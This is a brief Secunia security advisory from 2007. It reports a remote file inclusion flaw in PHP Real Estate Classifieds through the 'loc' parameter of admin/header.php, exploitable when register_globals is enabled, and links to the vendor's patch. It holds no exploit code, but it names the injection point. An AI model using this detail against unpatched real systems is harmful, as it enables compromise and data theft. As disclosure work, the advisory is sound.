SECUNIA ADVISORY ID: SA25615

VERIFY ADVISORY: http://secunia.com/advisories/25615/

CRITICAL: Highly critical

IMPACT: Exposure of system information, Exposure of sensitive information, System access

WHERE: >From remote

REVISION: 1.1 originally posted 2007-06-13

SOFTWARE: PHP Real Estate Classifieds - http://secunia.com/product/14523/

DESCRIPTION: not sec group has reported a vulnerability in PHP Real Estate Classifieds, which can be exploited by malicious people to disclose sensitive information or to compromise a vulnerable system.

Input passed to the "loc" parameter in admin/header.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. Successful exploitation requires that "register_globals" is enabled.

SOLUTION: Apply the vendor's security patch: http://phprealestatescript.com/securityUpdate_06_12_07.zip

PROVIDED AND/OR DISCOVERED BY: not sec group

CHANGELOG: 2007-06-13: Added CVE reference.

ORIGINAL ADVISORY: http://milw0rm.com/exploits/4055